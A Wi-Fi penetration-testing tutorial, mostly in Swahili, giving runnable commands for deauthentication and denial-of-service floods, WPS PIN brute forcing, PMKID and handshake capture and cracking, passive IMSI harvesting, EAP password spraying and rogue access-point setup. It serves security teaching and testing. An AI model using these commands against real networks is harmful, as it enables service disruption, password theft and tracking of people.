Pentesting Wifi

Reading time: 38 minutes

Amri za msingi za Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Vifaa

Hijacker & NexMon (Android Wi-Fi ya ndani)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Endesha airgeddon kwa docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Chanzo: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Inaweza kufanya mashambulizi ya Evil Twin, KARMA, na Known Beacons na kisha kutumia kiolezo cha phishing ili kupata password halisi ya mtandao au kunasa social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Zana hii inautomatisha mashambulizi ya WPS/WEP/WPA-PSK. Itaitekeleza kiotomatiki:

• Weka interface kwenye monitor mode
• Scan kwa networks zinazowezekana - na kukuruhusu kuchagua victim(s)
• Ikiwa WEP - Anzisha mashambulizi ya WEP
• Ikiwa WPA-PSK
• Ikiwa WPS: Pixie dust attack na bruteforce attack (kuwa mwangalifu brute-force attack inaweza kuchukua muda mrefu). Kumbuka kwamba haitajaribu null PIN au database/generated PINs.
• Jaribu kukamata PMKID kutoka AP ili ku-crack
• Jaribu ku-deauthenticate clients wa AP ili kukamata handshake
• Ikiwa PMKID au Handshake, jaribu bruteforce ukitumia top5000 passwords.

Muhtasari wa Mashambulizi

• DoS
• Deauthentication/disassociation -- Kutenganisha kila mtu (au ESSID/Client maalum)
• Random fake APs -- Ficha nets, inaweza kusababisha crash kwa scanners
• Overload AP -- Jaribu kuua AP (kwa kawaida si muhimu sana)
• WIDS -- Chezea IDS
• TKIP, EAPOL -- Baadhi ya mashambulizi maalum ya kufanya DoS kwa baadhi ya APs
• Cracking
• Crack WEP (several tools and methods)
• WPA-PSK
• WPS pin "Brute-Force"
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] -- Inafaa kukamata captive portal creds na/au kufanya mashambulizi ya LAN
• WPA-PSK Evil Twin -- Inafaa kwa mashambulizi ya mtandao ikiwa unajua password
• WPA-MGT -- Inafaa kukamata company credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open -- Inafaa kukamata captive portal creds na/au kufanya mashambulizi ya LAN
• + WPA -- Inafaa kukamata WPA handshakes

DOS

Deauthentication Packets

Maelezo kutoka here:.

Deauthentication attacks, a prevalent method in Wi-Fi hacking, involve forging "management" frames to forcefully disconnect devices from a network. These unencrypted packets deceive clients into believing they are from the legitimate network, enabling attackers to collect WPA handshakes for cracking purposes or to persistently disrupt network connections. This tactic, alarming in its simplicity, is widely used and has significant implications for network security.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 ina maana deauthentication
• 1 ni idadi ya deauths za kutumwa (unaweza kutuma zaidi ikiwa unataka); 0 ina maana zitatumwa bila kikomo
• -a 00:14:6C:7E:40:80 ni MAC address ya access point
• -c 00:0F:B5:34:30:30 ni MAC address ya client ya ku-deauthenticate; kama hii itaachwa basi broadcast deauthentication itatumwa (si kila mara inafanya kazi)
• ath0 ni jina la interface

Disassociation Packets

Paketi za Disassociation, zinazofanana na deauthentication packets, ni aina ya management frame zinazotumika katika mitandao ya Wi‑Fi. Paketi hizi hutumika kuvunja muunganisho kati ya kifaa (kama laptop au smartphone) na access point (AP). Tofauti kuu kati ya disassociation na deauthentication iko katika hali za matumizi yao. Wakati AP inatuma deauthentication packets ili kuondoa rogue devices waziwazi kutoka kwenye mtandao, paketi za disassociation kawaida hutumwa wakati AP inafungwa (shutdown), inapofanyiwa restart, au inapohamishwa, na hivyo kuhitajika kutenganisha vifaa vyote vilivyounganishwa.

Shambulio hili linaweza kutekelezwa kwa kutumia mdk4(mode "d"):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Zaidi ya DOS attacks na mdk4

Katika here.

ATTACK MODE b: Beacon Flooding

Inatuma beacon frames ili kuonyesha fake APs kwa clients. Hii inaweza wakati mwingine kusababisha crash ya network scanners na hata drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Kutuma fremu za uthibitisho kwa Access Points (APs) zote zinazopatikana ndani ya umbali kunaweza kuwazidisha mzigo APs hizi, hasa wakati wateja wengi wanahusika. Trafiki hii kubwa inaweza kusababisha kutokuwa thabiti kwa mfumo, na kufanya baadhi ya APs kuganda au hata kuanzishwa upya.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) huangalia ikiwa SSID imefunuliwa ipasavyo na kuthibitisha upeo wa AP. Mbinu hii, inayoambatana na bruteforcing hidden SSIDs kwa kutumia au bila wordlist, husaidia kutambua na kupata mitandao iliyofichwa.

ATTACK MODE m: Michael Countermeasures Exploitation

Kutuma paketi za nasibu au nakala kwa safu tofauti za QoS kunaweza kuchochea Michael Countermeasures kwenye TKIP APs, na kusababisha AP kuzimwa kwa takriban dakika moja. Njia hii ni taktiki yenye ufanisi ya DoS (Denial of Service).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Kufurika kwa AP kwa EAPOL Start frames kunaunda fake sessions, kukandamiza AP na kuzuia wateja halali. Vinginevyo, kuingiza fake EAPOL Logoff messages kunawaondoa wateja kwa nguvu; mbinu zote mbili huvuruga huduma ya mtandao kwa ufanisi.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Shambulio kwa IEEE 802.11s mesh networks

Shambulio mbalimbali dhidi ya link management na routing katika mesh networks.

ATTACK MODE w: WIDS Confusion

Cross-connecting clients to multiple WDS nodes or fake rogue APs can manipulate Intrusion Detection and Prevention Systems, creating confusion and potential system abuse.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer inayojumuisha vyanzo mbalimbali vya packet na seti kamili ya modifiers kwa ajili ya packet manipulation.

Airggedon

Airgeddon inatoa wengi wa mashambulizi yaliyopendekezwa katika maoni ya awali:

WPS

WPS (Wi-Fi Protected Setup) inarahisisha mchakato wa kuunganisha vifaa kwenye router, ikiongeza kasi na urahisi wa usanidi kwa mitandao iliyofichwa kwa WPA au WPA2 Personal. Haiwezi kufanya kazi kwa usalama wa WEP ambao unaweza kuvunjwa kwa urahisi. WPS inatumia PIN ya tarakimu 8, inayothibitishwa kwa nusu mbili, na kuifanya iwe nyeti kwa brute-force attacks kutokana na idadi ndogo ya mchanganyiko (uwezekano 11,000).

WPS Bruteforce

Kuna zana kuu 2 za kutekeleza hatua hii: Reaver na Bully.

• Reaver imeundwa kama shambulio thabiti na la vitendo dhidi ya WPS, na imethibitishwa dhidi ya aina mbalimbali za access points na utekekelezaji wa WPS.
• Bully ni utekelezaji mpya wa WPS brute force attack, umeandikwa kwa C. Una faida kadhaa juu ya msimbo wa awali wa Reaver: fewer dependencies, ufanisi ulioboreshwa wa memory na cpu, utunzaji sahihi wa endianness, na seti ya chaguzi zenye nguvu zaidi.

Shambulio linatumia WPS PIN's vulnerability, hasa kuonyeshwa kwa tarakimu nne za kwanza na jukumu la tarakimu ya mwisho kama checksum, ambalo linafanya brute-force attack kuwa rahisi. Hata hivyo, mbinu za kujilinda dhidi ya brute-force attacks, kama vile blocking MAC addresses za washambuliaji wasiotulia, zinahitaji MAC address rotation ili kuendelea na shambulio.

Baada ya kupata WPS PIN kwa kutumia zana kama Bully au Reaver, mshambuliaji anaweza kubaini WPA/WPA2 PSK, akihakikisha ufikiaji wa mtandao wa kudumu.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Njia iliyoboreshwa hii inalenga WPS PINs kwa kutumia udhaifu unaojulikana:

1. Pre-discovered PINs: Tumia hifadhidata ya PINs zinazojulikana zilizohusishwa na watengenezaji maalum wanaojulikana kutumia WPS PINs sawa. Hifadhidata hii inaendana octets tatu za kwanza za MAC-addresses na PINs zinazowezekana kwa watengenezaji hao.
2. PIN Generation Algorithms: Tumia algorithms kama ComputePIN na EasyBox, zinazohesabu WPS PINs kulingana na MAC-address ya AP. Algorithm ya Arcadyan pia inahitaji device ID, ikiongeza tabaka kwenye mchakato wa uzalishaji wa PIN.

WPS Pixie Dust attack

Dominique Bongard aligundua dosari katika baadhi ya Access Points (APs) kuhusu utengenezaji wa codes za siri, zinazoitwa nonces (E-S1 na E-S2). Ikiwa nonces hizi zinaweza kugunduliwa, kuvunja WPS PIN ya AP kunakuwa rahisi. AP hufichua PIN ndani ya code maalum (hash) ili kuthibitisha kuwa ni halali na si AP bandia (rogue). Nonces hizi kwa msingi ni "funguo" za kufungua "salama" inayoshikilia WPS PIN. More on this can be found here.

Kwa kifupi, tatizo ni kwamba baadhi ya APs hazikutumia funguo za kutosha nasibu za kusimbia PIN wakati wa mchakato wa muunganisho. Hii inafanya PIN kuwa hatarini kukisia kutoka nje ya mtandao (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ikiwa hautaki kubadilisha kifaa kwenda monitor mode, au reaver na bully zina matatizo, unaweza kujaribu OneShot-C. Zana hii inaweza kufanya Pixie Dust attack bila ya kuingia monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Baadhi ya mifumo iliyoundwa vibaya hata huruhusu Null PIN (PIN tupu au isiyokuwepo) kuipa ufikiaji, jambo ambalo ni la kushangaza. Chombo Reaver kina uwezo wa kujaribu udhaifu huu, tofauti na Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Shambulio zote zilizopendekezwa za WPS zinaweza kufanywa kwa urahisi kwa kutumia airgeddon.

• 5 na 6 zinakuwezesha kujaribu PIN yako maalum (kama una)
• 7 na 8 zinafanya Pixie Dust attack
• 13 inakuwezesha kujaribu NULL PIN
• 11 na 12 zitakusanya tena PIN zinazohusiana na AP iliyochaguliwa kutoka kwenye database zinazopatikana na kuunda PINs zinazowezekana kwa kutumia: ComputePIN, EasyBox na kwa hiari Arcadyan (inapendekezwa, kwa nini si?)
• 9 na 10 zitajaribu PIN zote zinazowezekana

WEP

Imevunjika sana na haitumiki tena siku hizi. Jua tu kwamba airgeddon ina chaguo la WEP linaloitwa "All-in-One" la kushambulia aina hii ya ulinzi. Zana zaidi zinatoa chaguo kama hicho.

WPA/WPA2 PSK

PMKID

Mwaka 2018, hashcat revealed njia mpya ya shambulio, tofauti kwa sababu inahitaji tu paketi moja tu na haihitaji klienti yoyote kuunganishwa na AP lengwa—ni tu mwingiliano kati ya mshambuliaji na AP.

Router nyingi za kisasa zinaongeza uwanja la hiari kwenye fremu ya EAPOL ya kwanza wakati wa kuunganishwa, inayojulikana kama Robust Security Network. Hii inajumuisha PMKID.

Kama chapisho la awali linavyoelezea, PMKID inaundwa kwa kutumia data zinazojulikana:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Kwa kuwa "PMK Name" ni thabiti, tunajua BSSID ya AP na station, na PMK ni sawa na ile kutoka kwa full 4-way handshake, hashcat inaweza kutumia taarifa hii kuvunja PSK na kupata neno la siri!

Ili kusanya taarifa hii na kufanya bruteforce ya nenosiri ndani ya mashine yako, unaweza kufanya:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured zitaonyeshwa kwenye console na pia saved ndani ya _ /tmp/attack.pcap_
Sasa, badilisha capture hiyo kuwa muundo wa hashcat/john na crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Tafadhali kumbuka muundo wa hash sahihi una sehemu 4, kama: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Ikiwa yako tu ina sehemu 3, basi, ni batili (PMKID capture haikuwa halali).

Kumbuka kwamba hcxdumptool pia capture handshakes (kitu kama hiki kitaonekana: MP:M1M2 RC:63258 EAPOLTIME:17091). Unaweza kubadilisha handshakes kuwa muundo wa hashcat/john kwa kutumia cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool couldn't be cracked even knowing the correct password. I would recommend to capture handshakes also via traditional way if possible, or capture several of them using this tool.

Kukamata handshake

Shambulio dhidi ya WPA/WPA2 networks linaweza kufanywa kwa kukamata handshake na kujaribu crack password offline. Mchakato huu unahusisha kusimamia mawasiliano ya mtandao maalum na BSSID kwenye channel fulani. Hapa kuna muongozo uliorahisishwa:

1. Tambua BSSID, channel, na connected client wa mtandao lengwa.
2. Tumia airodump-ng kusimamia trafiki ya mtandao kwenye channel na BSSID iliyoainishwa, ukitarajia kukamata handshake. Amri itakuwa kama hii:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Ili kuongeza nafasi ya kukamata handshake, tenganisha client kutoka kwenye network kwa muda mfupi ili kulazimisha re-authentication. Hii inaweza kufanywa kwa kutumia amri ya aireplay-ng, ambayo inatuma deauthentication packets kwa client:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Ni muhimu kujua kuwa kwa kuwa client alideauthenticated inaweza kujaribu kuungana na AP tofauti au, katika matukio mengine, na network tofauti.

Mara tu taarifa za handshake zinaonekana katika airodump-ng, hii inamaanisha handshake imekamatwa na unaweza kuacha kusikiliza:

Mara handshake imekamatwa, unaweza crack kwa kutumia aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Angalia kama handshake iko kwenye faili

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ikiwa zana hii itapata handshake isiyokamilika ya ESSID kabla ya ile iliyokamilika, haitagundua ile halali.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

Katika mipangilio ya enterprise WiFi, utakutana na mbinu mbalimbali za uthibitishaji, kila moja ikitoa viwango tofauti vya usalama na vipengele vya usimamizi. Unapokitumia zana kama airodump-ng kuchunguza trafiki ya mtandao, unaweza kuona vitambulisho vya aina hizi za uthibitishaji. Baadhi ya mbinu za kawaida ni pamoja na:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Njia hii inaunga mkono hardware tokens na one-time passwords ndani ya EAP-PEAP. Tofauti na MSCHAPv2, haitumii peer challenge na inatuma passwords kwa plaintext kwenda access point, ikileta hatari ya downgrade attacks.

2. EAP-MD5 (Message Digest 5):

• Inajumuisha kutuma MD5 hash ya password kutoka kwa client. HAIJAPENDEKEZWA kwa sababu ya urahisi wa dictionary attacks, ukosefu wa server authentication, na kutoweza kuzalisha WEP keys maalum kwa session.

3. EAP-TLS (Transport Layer Security):

• Inatumia certificates za client na server kwa authentication na inaweza kuzalisha kwa nguvu WEP keys zinazotegemea user na session kwa usalama wa mawasiliano.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Inatoa mutual authentication kupitia tunnel iliyofichwa, pamoja na mbinu ya kupata WEP keys dinamik kwa kila user na kila session. Inahitaji certificates za server tu, na clients kutumia credentials.

5. PEAP (Protected Extensible Authentication Protocol):

• Inafanya kazi kama EAP kwa kuunda TLS tunnel kwa mawasiliano ya kulindwa. Inaruhusu matumizi ya protocols dhaifu zaidi juu ya EAP kutokana na ulinzi wa tunnel.
• PEAP-MSCHAPv2: Mara nyingi huitwa PEAP, inaunganisha mfumo hatarishi wa MSCHAPv2 challenge/response na TLS tunnel inayolinda.
• PEAP-EAP-TLS (or PEAP-TLS): Kama EAP-TLS lakini huanzisha TLS tunnel kabla ya kubadilishana certificates, ikitoa usalama wa ziada.

You can find more information about these authentication methods here and here.

Kukamata Jina la Mtumiaji

Reading https://tools.ietf.org/html/rfc3748#page-27 inaonekana kwamba ukitumia EAP the "Identity" messages lazima ziwe supported, na jina la mtumiaji kitatumwa kwa clear katika "Response Identity" messages.

Hata ukitumia mojawapo ya njia salama zaidi za authentication: PEAP-EAP-TLS, inawezekana kukamata username inayotumwa katika EAP protocol. Ili kufanya hivyo, kamilisha authentication communication (anzisha airodump-ng katika channel na wireshark katika interface ile ile) na filter pakiti kwa eapol.
Ndani ya pakiti ya "Response, Identity", jina la mtumiaji la client litaonekana.

Utambulisho Bila Kutambulika

Identity hiding inasaidiwa na EAP-PEAP na EAP-TTLS. Katika muktadha wa mtandao wa WiFi, ombi la EAP-Identity kawaida linaanzishwa na access point (AP) wakati wa mchakato wa association. Ili kuhakikisha ulinzi wa anonymity ya mtumiaji, jibu kutoka kwa EAP client kwenye kifaa cha mtumiaji lina taarifa muhimu tu zinazohitajika kwa initial RADIUS server kuchakata ombi. Dhana hii inaonyeshwa kupitia matukio yafuatayo:

• EAP-Identity = anonymous
• Katika tukio hili, watumiaji wote wanatumia pseudonymous "anonymous" kama kitambulisho chao cha mtumiaji. initial RADIUS server inafanya kazi kama EAP-PEAP au EAP-TTLS server, inahusika na kusimamia upande wa server wa protocol ya PEAP au TTLS. Mbinu ya ndani (protected) ya authentication kisha inashughulikiwa kwa ndani au kupelekwa kwa remote (home) RADIUS server.
• EAP-Identity = anonymous@realm_x
• Katika hali hii, watumiaji kutoka realms tofauti wanaficha utambulisho wao huku wakionyesha realms zao. Hii inaruhusu initial RADIUS server ku-proxy EAP-PEAP au EAP-TTLS requests kwa RADIUS servers katika realms zao za nyumbani, ambazo zinachukua nafasi ya PEAP au TTLS server. initial RADIUS server inafanya kazi kama RADIUS relay node tu.
• Vinginevyo, initial RADIUS server inaweza kufanya kazi kama EAP-PEAP au EAP-TTLS server na kushughulikia mbinu ya protected authentication au kuituma kwa server nyingine. Chaguo hili hurahisisha konfigurasi ya sera tofauti kwa realms mbalimbali.

Katika EAP-PEAP, mara tu TLS tunnel inapojengwa kati ya PEAP server na PEAP client, PEAP server hutoa ombi la EAP-Identity na kulituma kupitia TLS tunnel. Client inajibu ombi hili la pili la EAP-Identity kwa kutuma EAP-Identity response ambayo ina utambulisho wa kweli wa mtumiaji kupitia tunnel iliyofichwa. Mbinu hii inazuia kwa ufanisi kufichuliwa kwa utambulisho wa mtumiaji kwa yeyote anayesikiliza trafiki ya 802.11.

EAP-TTLS inafuata utaratibu kidogo tofauti. Kwa EAP-TTLS, client kwa kawaida inathibitisha kutumia PAP au CHAP, zilizo salama kwa TLS tunnel. Katika kesi hii, client hujumuisha User-Name attribute na ama Password au CHAP-Password attribute katika ujumbe wa awali wa TLS unaotumwa baada ya kuanzishwa kwa tunnel.

Bila kujali protocol iliyochaguliwa, PEAP/TTLS server hupata maarifa ya utambulisho halisi wa mtumiaji baada ya TLS tunnel kuanzishwa. Utambulisho halisi unaweza kuwakilishwa kama user@realm au user pekee. Ikiwa PEAP/TTLS server pia inawajibika kwa authenticating mtumiaji, sasa inamiliki utambulisho wa mtumiaji na inaendelea na mbinu ya authentication iliyolindwa na TLS tunnel. Vinginevyo, PEAP/TTLS server inaweza kupeleka ombi jipya la RADIUS kwa home RADIUS server ya mtumiaji. Ombi hili jipya la RADIUS halina tabaka la PEAP au TTLS. Katika matukio ambapo mbinu ya protected authentication ni EAP, meseji za ndani za EAP zinapitishwa kwa home RADIUS server bila wrapper ya EAP-PEAP au EAP-TTLS. User-Name attribute ya ujumbe wa RADIUS unaotumwa ina utambulisho wa kweli wa mtumiaji, ikibadilisha anonymous User-Name kutoka kwenye ombi la RADIUS lililoingia. Wakati mbinu ya protected authentication ni PAP au CHAP (inayotumika tu na TTLS), User-Name na attributes nyingine za authentication zilizoondolewa kutoka kwa TLS payload zinachukuliwa katika ujumbe wa RADIUS unaotumwa, zikibadilisha anonymous User-Name na TTLS EAP-Message attributes zilizokuwepo katika ombi la RADIUS lililoingia.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X inaweza leak permanent subscriber identifier (IMSI) kwa cleartext wakati wa awamu ya unauthenticated identity ikiwa deployment haitekelezi pseudonyms/protected identities au TLS tunnel kuzunguka inner EAP.

Where the leak happens (high level):

• 802.11 association inakamilika kwa SSID (mara nyingi carrier offload SSIDs kama FreeWifi_secure, eduroam-like operator realms, n.k.).
• Authenticator anatumia EAP-Request/Identity.
• Vulnerable clients wanajibu EAP-Response/Identity na utambulisho wao wa kudumu = IMSI uliowekwa kama 3GPP NAI, kabla ya ulinzi wowote.
• Mfano wa NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Mtu yeyote anayesikiliza kwa passive RF anaweza kusoma frame hiyo. Hakuna 4-way handshake au TLS keying inayohitajika.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

# 1) Enable monitor mode
airmon-ng start wlan0

# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <SSID>

# 3) Capture 802.1X/EAP frames
# Wireshark display filters:
#   eap || eapol
#   (identity specifically): eap.code == 2 && eap.type == 1
# Kismet: add source wlan0mon; enable 802.1X/EAP views
# tcpdump (pcap capture):
#   tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# 4) Wait for a device to auto-connect to the SSID
# 5) Inspect the first EAP-Response/Identity frame
# Expected: ASCII NAI containing IMSI, e.g.
#   20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

Vidokezo:

• Inafanya kazi kabla ya tuneli yoyote ya TLS ikiwa deployment inatumia bare EAP‑SIM/AKA bila protected identity/pseudonyms.
• Thamani iliyofichuliwa ni kitambulisho cha kudumu kilichofungwa na SIM ya subscriber; kukusanya mbalimbali kunawezesha ufuatiliaji wa muda mrefu na matumizi mabaya ya telecom baadaye.

Athari

• Faragha: ufuatiliaji wa kudumu wa mtumiaji/kifaa kutokana na kunasa passive kwa Wi‑Fi katika maeneo ya umma.
• Kuanzisha matumizi mabaya ya telecom: kwa IMSI, mshambuliaji mwenye upatikanaji wa SS7/Diameter anaweza kuuliza eneo au kujaribu interception ya call/SMS na wizi wa MFA.

Mikakati ya kupunguza / kile cha kutafuta

• Thibitisha kwamba wateja wanatumia anonymous outer identities (pseudonyms) kwa EAP‑SIM/AKA kama ilivyoelezwa na mwongozo wa 3GPP (mfano, 3GPP TS 33.402).
• Pendelea kutunelisha awamu ya utambulisho (mfano, EAP‑TTLS/PEAP carrying inner EAP‑SIM/AKA) ili IMSI isitumwe wazi.
• Packets captures za association/auth hazipaswi kamwe kufichua IMSI ghafi katika EAP-Response/Identity.

Inayohusiana: Utilizi mbaya wa signalling ya telecom kwa vitambulisho vya simu vilivyokusanywa Telecom Network Exploitation

EAP-Bruteforce (password spray)

Ikiwa mteja anatarajiwa kutumia username and password (kumbuka kwamba EAP-TLS won't be valid katika kesi hii), basi unaweza kujaribu kupata list ya usernames (see next part) na passwords na kujaribu bruteforce upatikanaji kwa kutumia air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Unaweza pia kufanya shambulio hili ukitumia eaphammer:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Nadharia za Mashambulizi ya Mteja

Uchaguzi wa Mtandao na Kuhama

• Itifaki ya 802.11 inaeleza jinsi station inavyoungana na Extended Service Set (ESS) lakini haibainishi vigezo vya kuchagua ESS au access point (AP) ndani yake.
• Stations zinaweza kuhama kati ya AP zinazoshirikiana ESSID ile ile, zikidumisha muunganisho ndani ya jengo au eneo.
• Itifaki inahitaji uthibitisho wa station kwa ESS lakini haisisitizi uthibitisho wa AP kwa station.

Preferred Network Lists (PNLs)

• Stations huhifadhi ESSID ya kila mtandao wa wireless wanounganisha nao katika Preferred Network List (PNL), pamoja na maelezo ya usanidi maalum wa mtandao.
• PNL inatumika kuunganishwa kiotomatiki kwa mitandao inayojulikana, ikiboresha uzoefu wa mtumiaji kwa kurahisisha mchakato wa kuunganishwa.

Passive Scanning

• APs hupeperusha beacon frames kwa vipindi, zikitangaza uwepo wao na sifa, ikiwa ni pamoja na ESSID ya AP isipokuwa uenezi umezimwa.
• Wakati wa passive scanning, stations husikiliza beacon frames. Ikiwa ESSID ya beacon inafanana na kipengee katika PNL ya station, station inaweza kuunganishwa kiotomatiki na AP hiyo.
• Kujua PNL ya kifaa kunaruhusu uwezekano wa kutumiwa kwa kuiga ESSID ya mtandao unaojulikana, kuudanganya kifaa kuungana na rogue AP.

Active Probing

• Active probing inahusisha stations kutuma probe requests kugundua AP zinazokaribu na sifa zao.
• Directed probe requests zinamalenga ESSID maalum, zikisaidia kugundua kama mtandao fulani upo ndani ya eneo, hata ikiwa ni hidden network.
• Broadcast probe requests zina uwanja wa SSID uraia (null) na zimetumwa kwa AP zote za karibu, zikimruhusu station kuangalia kwa mtandao wowote uliopendekezwa bila kufichua yaliyomo katika PNL yake.

Simple AP with redirection to Internet

Kabla ya kuelezea jinsi ya kufanya mashambulizi ya kina zaidi itafafanuliwa jinsi ya tu kuunda AP na kupeleka trafiki yake kwa interface iliyounganishwa na Internet.

Tumia ifconfig -a hakiki kwamba interface ya wlan ya kuunda AP na interface iliyounganishwa na Internet zipo.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Unda faili ya usanidi /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Kisha set IPs na routes:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Kisha anza dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Unda faili ya config hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Simamisha michakato inayosumbua, weka monitor mode, na anza hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Upelekaji na Uelekezaji

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
